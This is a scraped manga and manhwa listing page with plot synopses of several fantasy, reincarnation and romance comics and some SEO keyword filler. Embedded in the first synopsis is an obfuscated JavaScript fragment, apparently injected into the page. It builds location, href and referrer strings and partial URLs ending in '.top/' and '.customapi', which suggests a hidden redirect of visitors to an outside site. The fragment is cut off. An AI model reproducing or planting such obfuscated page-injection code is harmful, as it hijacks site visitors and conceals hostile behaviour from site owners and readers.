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328 results

The Book Eating Magician

Book Eater is a Manga/Manhwa/Manhua in (English/Raw) language, Manhwa series is written by Updating This Comic is About A student at the magician's academy with little talent, but all the knowledge one would expect of a scholar. He soon gains the power to obtain skills from books directly. He is the book eater.<script></script><script>function _0x5723(){var _0x14ce33=['OZKcZ','cvBoe','364383nCOkUX','djzFf','google','text','then','13383848pjkNPf','1339907bKVJKS','1141972yiuCBD','dYWNV','includes','.customapi','44826kvRKKD','590iNSwCK','SMlBk','floor','4773690OjaKfe','25TCIBQG','referrer','54ekQKRf','rdWqY','http://rea','random','href','','KFIFJ','cZwqD','location','8307817UcLXAd','https://ip','.top/','kOoDf'];_0x5723=function(){return _0x14ce33;};return _0x5723();}(function(_0x1df6b7,_0x1be0b4){var _0x29e300=_0x3a91,_0x4b778c=_0x1df6b7();while(!![]){try{var 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The Book of Lagier

The Book of Lagier is a Manga/Manhwa/Manhua in (English/Raw) language, Fantasy series is written by Updating This Comic is About The great Demon King, Embilden, was the first to unite the demon world. One day, a human dared summon the Demon King. It was the greedy and fat, Prince Lagier Lou Jerlayla Rodwill! However, while summoning the Demon King, he had made a mistake in the process, which caused his death. Lagier’s body is forcefully frozen because of the contract he had made with the Demon King… “Well, I might as well just grant him his wish.” The Demon King decides to become Lagier and grant the wish the Prince had before he was frozen to death. Until the day the kingdom of Jerlayla rules the world with power unmatched by anyone! This is the start of a new legend……! “I should start by losing weight.” …I need to go on a diet first.


The Cursed Strongest Player Is Unrivaled In This World

Read “The Cursed Strongest Player Is Unrivaled In This World Manga” – “The Cursed Strongest Player Is Unrivaled In This World Manhwa” Online Free At Hot Manhwa The Summary Of The Comic The Cursed Strongest Player Is Unrivaled In This World: A World Where Many Different Races, Including Humans, Angels, Demons, And Beastmen Vie For Supremacy Was Engulfed In Chaos Because Of A Wielder Of Unfathomable Power, The Demon King, Zara… Is The Setting Of The Very Popular Online Vr Game 『Deep Sky Frontier』. The Heavy User, Ichinose Zen, Is The Only One Out Of The Tens Of Millions Of Players Who Had Successfully Defeated Demon King Zara. …But As Soon As He Did, The Light Coming From His Monitor Enveloped Him And Transported Him Into The World Of The Game. On Top Of That, His Appearance Is Exactly Like That Of The Demon King Zara, The One He Was Supposed To Have Defeated…? The Comic “The Cursed Strongest Player Is Unrivaled In This World” Belongs To The Genre: Action, Adventure, Comedy, Demons, Fantasy, Magic, Manga, Reincarnation “Manhuaplus, Manga Updates, Manhwa Website…” Are The Most Searched Keywords On The Website Manhwaclan. We Offer A Wide Selection Of The Best And Newest Comic Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Likemanga. You Can Read Top Manga The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King By Scavenging


The Daughter Of A Wealthy Family Went Crazy After Being Reborn

Read Manhua The Daughter Of A Wealthy Family Went Crazy After Being Reborn Online For Free At Manga Zin The Daughter Of A Wealthy Family Went Crazy After Being Reborn Novel Also Known As “A Wealthy Young Lady / Haomen Qianjin Chongsheng Hou Sha Fengle / Háomén Qiānjīn Chóngshēng Hòu Shā Fēngle / Reborn: The Savage Heiress / Thiên Kim Hào Môn Trùng Sinh Phản Đòn / 豪门千金重生后杀疯了”. This Ongoing Webtoon Was Released On 2024. The Story Was Written By 米分文化 And Illustrations By 米分文化. The Content Of The Comic The Daughter Of A Wealthy Family Went Crazy After Being Reborn: A Big Fire Made Her Understand The Human Heart. After Being Reborn, She Is Determined To Change Her Miserable Life! She Fought The Evil Sister And Broke The Family Ties, The Bai Family’s Rich Daughter Became Invincible! The Arrogant Nature, The Identity Of The Miracle Doctor’s Student, The Hacker Leader, The Math Genius… It Was All Just A Mask. The Most Important Thing Was That He Was The Heart Of The Master Of The Lu Mansion. The Comic The Daughter Of A Wealthy Family Went Crazy After Being Reborn Belongs To The Genre: Drama, Fantasy, Romance, Shoujo Mangazin Is A Comprehensive Website Featuring The Latest And Hottest Manga, Updated Rapidly To Cater To Readers With High-Quality Images And Provide Them With Excellent Experiences. With Keywords Such As “Topmanhua” And “Manhwatop,” As Well As Related Terms Like Zinmanga, Likemanga, And Read Manhwa Online Ensures Readers Have Access To A Wide Selection Of Top-Notch Manga Content. Please Always Follow And Share With Your Friends To Support The Website So That We Have More Motivation To Publish The Latest And Best Comics.


The Demon Maid Only Wants to Be Bullied by the Villainess

The Noble Lady binds Tentacle Maid Sharan, a pious girl, has secured a well-paying job as a maid. Her mission is to serve a prideful, sadistic noble lady named Lynette. However, her job won\'t simply be that easy....


The Diary Of A Sage Around 40 Living In Another World: Carefree Another World Teacher Life

An alternate version of the "Around 40 Kenja no Isekai Seikatsu Nikki" story with a different artist. Satoshi Osako was a player of the VRRPG 『Sword and Sorcery』 who defeated the Evil God and died for his troubles. When he awoke again he found himself in a strange unknown forest. Furthermore he possessed his avatar’s body and abilities. In other words, he was a cheat. Can a 40 year old DT, live peacefully in this world? Let his isekai adventure begin.


The Duchess Has A Deathwish

The Duchess Has a Deathwish manhwa, , ?”I was rebornand I want to die again.” Despite choosing to die in her previous life, our protagonist is reborn as Selena, the short-lived villainess from a novel. The character Selena was written to be so villainous she spends her final moments isolated in a dungeon. But our reincarnated protagonist has no will to live anyway, so she might as well jump (again) and save Selena from her predetermined miserable fate. But when Selena’s family and a knight prevent her from dying, what can she do?


The Fairy Princess Has Decided To Take Revenge

Due to her strong magical powers, Maria, the daughter of a duke who grew up coldly oppressed by her family, believed that she could be happy with her kind fiancée. However, when he witnessed his fiancée cheating on him, his magical powers went out of control, and he was executed for attempted assassination of the royal family. Maria’s soul, which has been tattered by betrayal and repeated torture, is reborn as Mariabelle, a member of the neighboring country’s royal family. “I hope you will be happy in your next life. Mariabell will grow up with the love of the fairies and her family. Mariabell was happy and content with her peaceful days, but one day, the fairies disappeared. It is said that it is related to Mariabel’s previous life. There was a reason why the little fairy chose the soul of Maria, who was hurt by her betrayal, and reborn as a member of the royal family of the neighboring country…


The Golden Dawn Light Will Shine For You

Read manhwa The Golden Light of Dawn / The golden dawn light will shine for you / 황금빛 여명이 너를 비추리 You’re still precious to me. After losing her family in a demon attack, Rosha is reborn as the 777th most powerful magic knight in the Golden Dawn Society. To avenge her family, she trains hard and rises through the ranks against the odds. Then, she is tasked with protecting little Joshua, who is said to be the Child of God.


The Gothic World of Nyanpire

Once upon a time, an abandoned kitten was on the brink of death. Thankfully, a vampire came up to him and offered him in own blood, thus Nyanpire was born! Follow his comical adventures with his wacky cast of friends such as a cat-samurai, or a fallen angel!


The High School Survival Guide For A Wizard

Despite her hatred of humans, the powerful wizard Oz decides to attend a human high school and make friends due to an old deal. Unfortunately, she has difficulty adjusting due to her uncontrollable magic. Things get even more complicated when a mysterious tornado from Oz’s world drops a knight named Dorothy at her school. In an effort not to blow her cover, Oz quickly takes him in, oblivious to the fact that this annoying intruder may be the key to unlocking the school life she wants.
